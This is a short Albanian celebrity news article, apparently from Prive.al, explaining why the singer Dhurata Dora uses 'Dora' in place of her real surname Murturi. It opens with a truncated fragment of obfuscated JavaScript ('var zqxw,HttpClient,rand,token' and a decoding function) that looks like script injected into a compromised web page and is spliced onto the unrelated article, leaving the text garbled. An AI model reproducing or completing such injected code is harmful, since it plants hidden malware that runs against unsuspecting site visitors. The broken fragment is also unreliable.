;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Zbulohet: Ja çka e shtyu Dhurata Dorën ta ndryshojë mbiemrin

By

Artistë shqiptarë që në tregun muzikor njihen me nofka tjera, komplet të ndryshme nga emri që e kanë ka me shumicë.

Megjithatë, në shumicën absolutë të rasteve, ata ndërrojnë emrin, por jo edhe mbiemrin siç ka vepruar Dhurata Dora.

Pak kush e di se mbiemri i saj i vërtetë është Murturi dhe jo Dora.

E ky mbiemër me të cilin njihet artistikisht ka një arsye të vecantë pse është i tillë.

Origjina gjendet tek jetesa në Gjermani e këngëtares së hitit ‘Veç ti’. Shkaku i vështirësisë për të shqiptuar shkronjën Dh nga gjermano-folësit, ajo është quajtur si Dorata.

Shkurtesa Dora, e derivuar nga emri me të cilin i referoheshin gjermano-folësit duket se ka qenë e duhura për këngëtaren dhe rrugëtimin e saj në muzikë që sot përbën një prej artisteve më të suksesshme shqiptare. /Prive.al/

Artikuj të ngjashëm